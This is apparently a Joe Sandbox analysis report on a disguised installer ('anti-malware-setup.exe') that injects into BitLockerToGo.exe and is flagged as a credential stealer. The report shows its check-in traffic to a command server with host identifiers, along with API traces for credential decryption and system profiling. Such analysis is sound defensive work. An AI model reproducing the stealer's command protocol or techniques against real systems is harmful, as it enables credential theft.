                                                                                                                                                                                                            2025-01-10 10:34:39 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                            2025-01-10 10:34:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            8192.168.2.562024104.21.48.14436204C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2025-01-10 10:34:40 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 121
                                                                                                                                                                                                            Host: sputnik-1985.com
                                                                                                                                                                                                            2025-01-10 10:34:40 UTC121OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 62 64 34 65 38 31 39 35 31 33 30 36 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 26 68 77 69 64 3d 32 43 31 42 38 34 30 43 34 45 44 35 46 35 38 46 34 45 43 30 45 39 37 39 46 31 31 37 36 39 42 35
                                                                                                                                                                                                            Data Ascii: act=get_message&ver=4.0&lid=HpOoIh--bd4e81951306&j=b9abc76ce53b6fc3a03566f8f764f5ea&hwid=2C1B840C4ED5F58F4EC0E979F11769B5
                                                                                                                                                                                                            2025-01-10 10:34:40 UTC1118INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 10:34:40 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=olnv1v9gv3n073la2o7pk878sp; expires=Tue, 06 May 2025 04:21:19 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1e0HnSKKDaaoCCtAlggecpoRLccJKJ6lUyMmdCPMjV32Pzlwb%2FJP1o2vivR3FkqXXDFC4QQuPhdYWAYxUoS40QvhPMPpYhRvmBzjfLQ2wl8uzwQsuymcDsB9KSyj8iOIHXlW"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8ffc04127858c461-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1628&min_rtt=1622&rtt_var=620&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=1022&delivery_rate=1746411&cwnd=228&unsent_bytes=0&cid=1ed75eb1318c8df3&ts=468&x=0"
                                                                                                                                                                                                            2025-01-10 10:34:40 UTC54INData Raw: 33 30 0d 0a 52 4a 72 63 70 4f 56 76 53 4d 6f 4f 2f 41 6a 47 70 2b 73 68 7a 79 32 69 68 74 32 7a 4e 30 66 6a 38 79 4f 73 56 6e 73 43 44 6f 73 66 78 77 3d 3d 0d 0a
                                                                                                                                                                                                            Data Ascii: 30RJrcpOVvSMoO/AjGp+shzy2iht2zN0fj8yOsVnsCDosfxw==
                                                                                                                                                                                                            2025-01-10 10:34:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Statistics

                                                                                                                                                                                                            CPU Usage

                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            Memory Usage

                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                            Behavior

                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            System Behavior

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                            Start time:05:34:00
                                                                                                                                                                                                            Start date:10/01/2025
                                                                                                                                                                                                            Path:C:\Users\user\Desktop\anti-malware-setup.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\anti-malware-setup.exe"
                                                                                                                                                                                                            Imagebase:0xcd0000
                                                                                                                                                                                                            File size:4'063'744 bytes
                                                                                                                                                                                                            MD5 hash:FEDB69AF5DE74D46366AD0570E77D9AC
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.2322019566.000000000213A000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                                            Start time:05:34:23
                                                                                                                                                                                                            Start date:10/01/2025
                                                                                                                                                                                                            Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                                                                                                                                                            Imagebase:0xb00000
                                                                                                                                                                                                            File size:231'736 bytes
                                                                                                                                                                                                            MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2411433910.0000000003497000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Disassembly

                                                                                                                                                                                                            Reset < >

                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                              Function 00CFBD40 Relevance: .1, Instructions: 116COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.2318498130.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.2318465214.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2318665080.0000000000E9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2318665080.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2318665080.0000000000F93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2318665080.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2318665080.0000000000FB1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2318665080.0000000000FB5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2320081075.000000000107D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2320109809.000000000107E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2320131718.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2320157029.0000000001080000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2320182902.0000000001089000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2320182902.0000000001099000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2320182902.000000000109D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2320182902.00000000010B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2320261419.00000000010B9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2320276892.00000000010BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.2320276892.00000000010D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_cd0000_anti-malware-setup.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: c8bac5558e55969c32dc51b64a7c4527bb7c2bbf13c3dd7484c4191df8abf1c4
                                                                                                                                                                                                              • Instruction ID: 23a9a6e37cf2b1e0acf6f13e1859e122e8c202bbe6249b7f10329da4b6c34be3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8bac5558e55969c32dc51b64a7c4527bb7c2bbf13c3dd7484c4191df8abf1c4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A351E0B46083058FD314DF28D1A476ABBF0FF89758F10896CE5988B392D77A9945CF42

                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                              Execution Coverage:8.7%
                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                              Signature Coverage:67.8%
                                                                                                                                                                                                              Total number of Nodes:286
                                                                                                                                                                                                              Total number of Limit Nodes:18
                                                                                                                                                                                                              execution_graph 13361 43c302 13363 43c20c 13361->13363 13362 43c2c8 13363->13362 13365 43b8a0 LdrInitializeThunk 13363->13365 13365->13362 13366 436980 13367 4369a0 13366->13367 13370 436a58 13367->13370 13375 43b8a0 LdrInitializeThunk 13367->13375 13368 436c1e 13370->13368 13372 436b4e 13370->13372 13374 43b8a0 LdrInitializeThunk 13370->13374 13372->13368 13376 43b8a0 LdrInitializeThunk 13372->13376 13374->13372 13375->13370 13376->13368 13377 40c946 CoInitializeEx CoInitializeEx 13378 40d307 13379 40d374 13378->13379 13381 40d38e 13378->13381 13379->13381 13382 43b8a0 LdrInitializeThunk 13379->13382 13382->13381 13383 42bf8a 13384 42bf96 13383->13384 13385 42c07f GetComputerNameExA 13384->13385 13386 42c0d7 13385->13386 13386->13386 13387 43bfcd 13388 43bfe0 13387->13388 13388->13388 13390 43c0ef 13388->13390 13393 43b8a0 LdrInitializeThunk 13388->13393 13389 43c13e 13390->13389 13394 43b8a0 LdrInitializeThunk 13390->13394 13393->13390 13394->13389 13395 435112 13397 435127 13395->13397 13396 43513b GetUserDefaultUILanguage 13398 435158 13396->13398 13397->13396 13399 425610 13400 42564e 13399->13400 13401 42562d 13399->13401 13401->13400 13409 43b8a0 LdrInitializeThunk 13401->13409 13403 425670 13403->13400 13410 43a280 13403->13410 13406 425682 13408 4256ae 13406->13408 13413 43b8a0 LdrInitializeThunk 13406->13413 13414 43a2a0 13408->13414 13409->13403 13418 43cdb0 13410->13418 13412 43a28a RtlAllocateHeap 13412->13406 13413->13408 13415 43a2b3 13414->13415 13416 43a2b5 13414->13416 13415->13400 13417 43a2ba RtlFreeHeap 13416->13417 13417->13400 13419 43cdc0 13418->13419 13419->13412 13419->13419 13420 43a2d0 13421 43a30e 13420->13421 13424 43a2ee 13420->13424 13422 43a412 13421->13422 13423 43a280 RtlAllocateHeap 13421->13423 13427 43a349 13423->13427 13424->13421 13430 43b8a0 LdrInitializeThunk 13424->13430 13426 43a2a0 RtlFreeHeap 13426->13422 13428 43a37f 13427->13428 13431 43b8a0 LdrInitializeThunk 13427->13431 13428->13426 13430->13421 13431->13428 13432 40af59 13435 40af80 13432->13435 13434 40af38 13435->13434 13436 43b800 13435->13436 13437 43b840 13436->13437 13438 43b875 13436->13438 13439 43b84e 13436->13439 13440 43b818 13436->13440 13441 43b866 13436->13441 13443 43a280 RtlAllocateHeap 13437->13443 13438->13435 13444 43a280 RtlAllocateHeap 13439->13444 13440->13437 13440->13438 13440->13441 13445 43b82b RtlReAllocateHeap 13440->13445 13442 43a2a0 RtlFreeHeap 13441->13442 13442->13438 13443->13439 13444->13441 13445->13437 13446 410698 13448 4106b6 13446->13448 13447 40ee93 13448->13447 13450 414620 13448->13450 13451 414640 13450->13451 13451->13451 13460 43e780 13451->13460 13453 43eab0 LdrInitializeThunk 13457 41477d 13453->13457 13454 4149de 13454->13447 13457->13453 13457->13454 13457->13457 13458 43e780 LdrInitializeThunk 13457->13458 13459 4147dc 13457->13459 13464 43eb80 13457->13464 13458->13457 13459->13454 13470 43b8a0 LdrInitializeThunk 13459->13470 13462 43e7a0 13460->13462 13461 43e8ce 13461->13457 13462->13461 13471 43b8a0 LdrInitializeThunk 13462->13471 13466 43eba0 13464->13466 13465 43ebfe 13467 43ecae 13465->13467 13473 43b8a0 LdrInitializeThunk 13465->13473 13466->13465 13472 43b8a0 LdrInitializeThunk 13466->13472 13467->13457 13470->13454 13471->13461 13472->13465 13473->13467 13474 42af9f 13476 42afd0 13474->13476 13475 42b04b GetComputerNameExA 13476->13475 13476->13476 13482 4085e0 13483 4085ef 13482->13483 13484 4088ae ExitProcess 13483->13484 13485 408604 GetCurrentProcessId GetCurrentThreadId 13483->13485 13491 408844 13483->13491 13486 40862a 13485->13486 13487 40862e SHGetSpecialFolderPathW 13485->13487 13486->13487 13488 43a280 RtlAllocateHeap 13487->13488 13489 4087c1 GetForegroundWindow 13488->13489 13489->13491 13491->13484 13492 40d0e1 13493 40d0f0 13492->13493 13496 436c90 13493->13496 13495 40d1d5 13497 436cb0 CoCreateInstance 13496->13497 13499 437372 13497->13499 13500 436e2e SysAllocString 13497->13500 13502 437382 GetVolumeInformationW 13499->13502 13504 436ed3 13500->13504 13503 437399 13502->13503 13503->13495 13505 436ee2 CoSetProxyBlanket 13504->13505 13506 43735f SysFreeString 13504->13506 13507 437355 13505->13507 13508 436f02 13505->13508 13506->13499 13507->13506 13508->13508 13509 436f9b SysAllocString 13508->13509 13510 437020 13509->13510 13510->13510 13511 43704d SysAllocString 13510->13511 13514 437071 13511->13514 13512 43733c SysFreeString SysFreeString 13512->13507 13513 437332 13513->13512 13514->13512 13514->13513 13515 4370b8 VariantInit 13514->13515 13517 437100 13515->13517 13516 437321 VariantClear 13516->13513 13517->13516 13518 420220 13519 42022e 13518->13519 13523 420288 13518->13523 13519->13519 13524 420340 13519->13524 13525 420350 13524->13525 13525->13525 13528 43e920 13525->13528 13527 42043f 13529 43e940 13528->13529 13530 43ea5e 13529->13530 13532 43b8a0 LdrInitializeThunk 13529->13532 13530->13527 13532->13530 13533 42b4e1 13534 42b4ec 13533->13534 13535 42b8fa GetPhysicallyInstalledSystemMemory 13534->13535 13536 42b930 13535->13536 13536->13536 13537 42d526 CoSetProxyBlanket 13538 4165e4 13540 4165f0 13538->13540 13539 41679e CryptUnprotectData 13541 4167c8 13539->13541 13540->13539 13544 418257 13541->13544 13546 4187b0 13541->13546 13543 4182d6 13544->13543 13544->13544 13545 43e920 LdrInitializeThunk 13544->13545 13545->13544 13547 4187e0 13546->13547 13553 41882e 13547->13553 13581 43b8a0 LdrInitializeThunk 13547->13581 13549 41899e 13550 43a280 RtlAllocateHeap 13549->13550 13562 418a98 13549->13562 13557 4189d9 13550->13557 13551 41890e 13551->13549 13572 418cd2 13551->13572 13583 43b8a0 LdrInitializeThunk 13551->13583 13553->13551 13582 43b8a0 LdrInitializeThunk 13553->13582 13555 418a3f 13556 43a2a0 RtlFreeHeap 13555->13556 13556->13562 13557->13555 13584 43b8a0 LdrInitializeThunk 13557->13584 13560 418c6e 13561 418c73 13560->13561 13564 418d02 13560->13564 13561->13572 13586 43b8a0 LdrInitializeThunk 13561->13586 13562->13560 13562->13561 13562->13572 13585 43b8a0 LdrInitializeThunk 13562->13585 13567 418d72 13564->13567 13587 43b8a0 LdrInitializeThunk 13564->13587 13566 418e8e 13568 43a280 RtlAllocateHeap 13566->13568 13566->13572 13567->13566 13588 43b8a0 LdrInitializeThunk 13567->13588 13573 418f63 13568->13573 13570 419668 13571 43a2a0 RtlFreeHeap 13570->13571 13571->13572 13572->13541 13580 418fce 13573->13580 13589 43b8a0 LdrInitializeThunk 13573->13589 13577 43b8a0 LdrInitializeThunk 13577->13580 13578 43a280 RtlAllocateHeap 13578->13580 13579 43a2a0 RtlFreeHeap 13579->13580 13580->13570 13580->13577 13580->13578 13580->13579 13590 43a450 13580->13590 13594 43a540 13580->13594 13581->13553 13582->13551 13583->13549 13584->13555 13585->13560 13586->13572 13587->13567 13588->13566 13589->13580 13591 43a45d 13590->13591 13592 43a4ce 13590->13592 13591->13592 13598 43b8a0 LdrInitializeThunk 13591->13598 13592->13580 13595 43a56e 13594->13595 13596 43a546 13594->13596 13595->13580 13596->13595 13599 43b8a0 LdrInitializeThunk 13596->13599 13598->13592 13599->13595 13601 43ba2d 13602 43ba36 GetForegroundWindow 13601->13602 13603 43ba4b 13602->13603 13604 423470 13605 42347f 13604->13605 13616 43d940 13605->13616 13609 43d820 LdrInitializeThunk 13611 423514 13609->13611 13610 423523 13611->13609 13611->13610 13612 423ee0 13611->13612 13630 43df30 13611->13630 13612->13610 13640 43b8a0 LdrInitializeThunk 13612->13640 13615 424798 13617 43d960 13616->13617 13619 43d9be 13617->13619 13641 43b8a0 LdrInitializeThunk 13617->13641 13618 4234a9 13618->13610 13618->13611 13626 43d820 13618->13626 13619->13618 13621 43a280 RtlAllocateHeap 13619->13621 13623 43da6a 13621->13623 13622 43a2a0 RtlFreeHeap 13622->13618 13625 43dadf 13623->13625 13642 43b8a0 LdrInitializeThunk 13623->13642 13625->13622 13628 43d850 13626->13628 13627 43d90f 13627->13611 13628->13627 13643 43b8a0 LdrInitializeThunk 13628->13643 13631 43df50 13630->13631 13632 43dfae 13631->13632 13644 43b8a0 LdrInitializeThunk 13631->13644 13633 43e29a 13632->13633 13635 43a280 RtlAllocateHeap 13632->13635 13633->13611 13637 43e05b 13635->13637 13636 43a2a0 RtlFreeHeap 13636->13633 13639 43e0e2 13637->13639 13645 43b8a0 LdrInitializeThunk 13637->13645 13639->13636 13639->13639 13640->13615 13641->13619 13642->13625 13643->13627 13644->13632 13645->13639 13646 43bd70 13647 43bd91 13646->13647 13649 43bdae 13646->13649 13647->13649 13650 43b8a0 LdrInitializeThunk 13647->13650 13650->13649 13651 437f30 13656 437f60 13651->13656 13652 43d820 LdrInitializeThunk 13652->13656 13654 43811c 13656->13652 13656->13654 13658 43dc10 13656->13658 13668 43e2b0 13656->13668 13678 43b8a0 LdrInitializeThunk 13656->13678 13659 43dc30 13658->13659 13661 43dc8e 13659->13661 13679 43b8a0 LdrInitializeThunk 13659->13679 13660 43df23 13660->13656 13661->13660 13663 43a280 RtlAllocateHeap 13661->13663 13665 43dd27 13663->13665 13664 43a2a0 RtlFreeHeap 13664->13660 13667 43dd9e 13665->13667 13680 43b8a0 LdrInitializeThunk 13665->13680 13667->13664 13667->13667 13669 43e2c1 13668->13669 13670 43e3ae 13669->13670 13681 43b8a0 LdrInitializeThunk 13669->13681 13671 43e5bc 13670->13671 13673 43a280 RtlAllocateHeap 13670->13673 13671->13656 13674 43e433 13673->13674 13676 43e50e 13674->13676 13682 43b8a0 LdrInitializeThunk 13674->13682 13675 43a2a0 RtlFreeHeap 13675->13671 13676->13675 13678->13656 13679->13661 13680->13667 13681->13670 13682->13676 13683 42bbf6 13685 42bc20 13683->13685 13684 42bcfe 13685->13684 13687 43b8a0 LdrInitializeThunk 13685->13687 13687->13684 13688 4227f6 13689 4227fe 13688->13689 13689->13689 13690 43e920 LdrInitializeThunk 13689->13690 13692 422991 13690->13692 13691 422a9b 13694 4206d0 3 API calls 13691->13694 13692->13691 13695 422b6b 13692->13695 13696 4206d0 13692->13696 13694->13695 13697 43e780 LdrInitializeThunk 13696->13697 13698 420710 13697->13698 13699 43a280 RtlAllocateHeap 13698->13699 13704 420e59 13698->13704 13700 420772 13699->13700 13709 420807 13700->13709 13711 43b8a0 LdrInitializeThunk 13700->13711 13702 43a2a0 RtlFreeHeap 13705 420dc6 13702->13705 13703 43a280 RtlAllocateHeap 13703->13709 13704->13691 13705->13704 13713 43b8a0 LdrInitializeThunk 13705->13713 13706 420db4 13706->13702 13709->13703 13709->13706 13710 43a2a0 RtlFreeHeap 13709->13710 13712 43b8a0 LdrInitializeThunk 13709->13712 13710->13709 13711->13700 13712->13709 13713->13705 13714 40cab7 13715 40cabf CoInitializeSecurity 13714->13715 13717 40d5fd 13721 4095f0 13717->13721 13719 40d604 CoUninitialize 13720 40d620 13719->13720 13722 409604 13721->13722 13722->13719 13722->13722

                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                              Function 00436C90 Relevance: 30.4, APIs: 11, Strings: 6, Instructions: 640memorycomCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 0 436c90-436caf 1 436cb0-436d07 0->1 1->1 2 436d09-436d18 1->2 3 436d20-436d4b 2->3 3->3 4 436d4d-436d8a 3->4 5 436d90-436db1 4->5 5->5 6 436db3-436dcd 5->6 8 436dda-436e28 CoCreateInstance 6->8 9 436dcf 6->9 10 437372-437397 call 43d1d0 GetVolumeInformationW 8->10 11 436e2e-436e5f 8->11 9->8 16 4373a1-4373a3 10->16 17 437399-43739d 10->17 12 436e60-436ea7 11->12 12->12 14 436ea9-436edc SysAllocString 12->14 22 436ee2-436efc CoSetProxyBlanket 14->22 23 43735f-43736e SysFreeString 14->23 18 4373bd-4373c8 16->18 17->16 20 4373d4-43740f 18->20 21 4373ca-4373d1 18->21 24 437410-43744e 20->24 21->20 25 436f02-436f1f 22->25 26 437355-43735b 22->26 23->10 24->24 27 437450-437484 call 41cfb0 24->27 28 436f20-436f99 25->28 26->23 33 437490-437497 27->33 28->28 30 436f9b-437011 SysAllocString 28->30 32 437020-43704b 30->32 32->32 34 43704d-437076 SysAllocString 32->34 33->33 35 437499-4374aa 33->35 39 43733c-43734e SysFreeString * 2 34->39 40 43707c-43709e 34->40 37 4373b0-4373b7 35->37 38 4374b0-4374c3 call 4080c0 35->38 37->18 41 4374c8-4374cf 37->41 38->37 39->26 45 437332-437338 40->45 46 4370a4-4370a7 40->46 45->39 46->45 47 4370ad-4370b2 46->47 47->45 48 4370b8-4370fe VariantInit 47->48 49 437100-43711a 48->49 49->49 50 43711c-437126 49->50 51 43712a-43712c 50->51 52 437132-437138 51->52 53 437321-43732e VariantClear 51->53 52->53 54 43713e-437148 52->54 53->45 55 43714a-437151 54->55 56 43718d-43718f 54->56 58 43716c-437170 55->58 57 437191-4371ab call 408030 56->57 67 4371b1-4371bd 57->67 68 4372d0-4372e1 57->68 59 437172-43717b 58->59 60 437160 58->60 62 437182-437186 59->62 63 43717d-437180 59->63 65 437161-43716a 60->65 62->65 66 437188-43718b 62->66 63->65 65->57 65->58 66->65 67->68 69 4371c3-4371cb 67->69 70 4372e3 68->70 71 4372e8-4372f3 68->71 72 4371d0-4371da 69->72 70->71 73 4372f5 71->73 74 4372fa-43731d call 408060 call 408040 71->74 76 4371f0-4371f6 72->76 77 4371dc-4371e1 72->77 73->74 74->53 80 437214-437224 76->80 81 4371f8-4371fb 76->81 79 437280-437284 77->79 85 437286-43728e 79->85 82 437226-437229 80->82 83 43729a-4372a2 80->83 81->80 86 4371fd-437212 81->86 82->83 87 43722b-43727b 82->87 83->85 90 4372a4-4372a7 83->90 85->68 89 437290-437292 85->89 86->79 87->79 89->72 91 437298 89->91 92 4372a9-4372ca 90->92 93 4372cc-4372ce 90->93 91->68 92->79 93->79
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CoCreateInstance.OLE32(0044068C,00000000,00000001,0044067C), ref: 00436E1D
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(B200B204), ref: 00436EAE
                                                                                                                                                                                                              • CoSetProxyBlanket.COMBASE(BD24272E,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00436EF4
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(88598850), ref: 00436FA0
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(88598850), ref: 0043704E
                                                                                                                                                                                                              • VariantInit.OLEAUT32(0FCC0FD7), ref: 004370BD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocString$BlanketCreateInitInstanceProxyVariant
                                                                                                                                                                                                              • String ID: C$LLaL$Z`$\$k_$}b
                                                                                                                                                                                                              • API String ID: 65563702-2615794114
                                                                                                                                                                                                              • Opcode ID: ad29833ed1338fee8da95c9203b6fd2dc6c77385f67a1108a53f6f6df10e7fbe
                                                                                                                                                                                                              • Instruction ID: be7bbc96d51e0d9d06873dcc487c05ed3c248026cdc4e50e5904f424c4761214
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ad29833ed1338fee8da95c9203b6fd2dc6c77385f67a1108a53f6f6df10e7fbe
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D2233B2A083119BD724CF68C84176BBBE5EFD9300F15892DE9D59B390D778E805CB86
                                                                                                                                                                                                              Function 0040D5FD Relevance: 24.3, APIs: 1, Strings: 15, Instructions: 332COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 98 40d5fd-40d61f call 4095f0 CoUninitialize 101 40d620-40d638 98->101 101->101 102 40d63a-40d695 101->102 103 40d6a0-40d705 102->103 103->103 104 40d707-40d711 103->104 105 40d713-40d718 104->105 106 40d72b-40d739 104->106 107 40d720-40d729 105->107 108 40d73b-40d73f 106->108 109 40d74d 106->109 107->106 107->107 110 40d740-40d749 108->110 111 40d750-40d758 109->111 110->110 112 40d74b 110->112 113 40d75a-40d75b 111->113 114 40d76b-40d775 111->114 112->111 117 40d760-40d769 113->117 115 40d777-40d778 114->115 116 40d78b-40d793 114->116 118 40d780-40d789 115->118 119 40d795-40d79b 116->119 120 40d7ad 116->120 117->114 117->117 118->116 118->118 121 40d7a0-40d7a9 119->121 122 40d7b0-40d7bc 120->122 121->121 123 40d7ab 121->123 124 40d7d1-40d89a 122->124 125 40d7be 122->125 123->122 127 40d8a0-40d95c 124->127 126 40d7c0-40d7cd 125->126 126->126 128 40d7cf 126->128 127->127 129 40d962-40d982 127->129 128->124 130 40d990-40d9a8 129->130 130->130 131 40d9aa-40d9c0 call 40b700 130->131 133 40d9c5-40d9e8 131->133
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Uninitialize
                                                                                                                                                                                                              • String ID: !=s=$"=6=$#=<=$$='=$&=O=$)=k=$,="=$1=g=$3=2=$6= =$8=1=$9=+=$<=)=$q=l=$}=p=
                                                                                                                                                                                                              • API String ID: 3861434553-2084406169
                                                                                                                                                                                                              • Opcode ID: e10c166e449cadfe5e427b0f141e011440bcba76ac02f030b5a7a41c0d128f99
                                                                                                                                                                                                              • Instruction ID: 1d13ac201350cec93a1d4c9f6dabf069617c0155b62c46b23090b54674f08de1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e10c166e449cadfe5e427b0f141e011440bcba76ac02f030b5a7a41c0d128f99
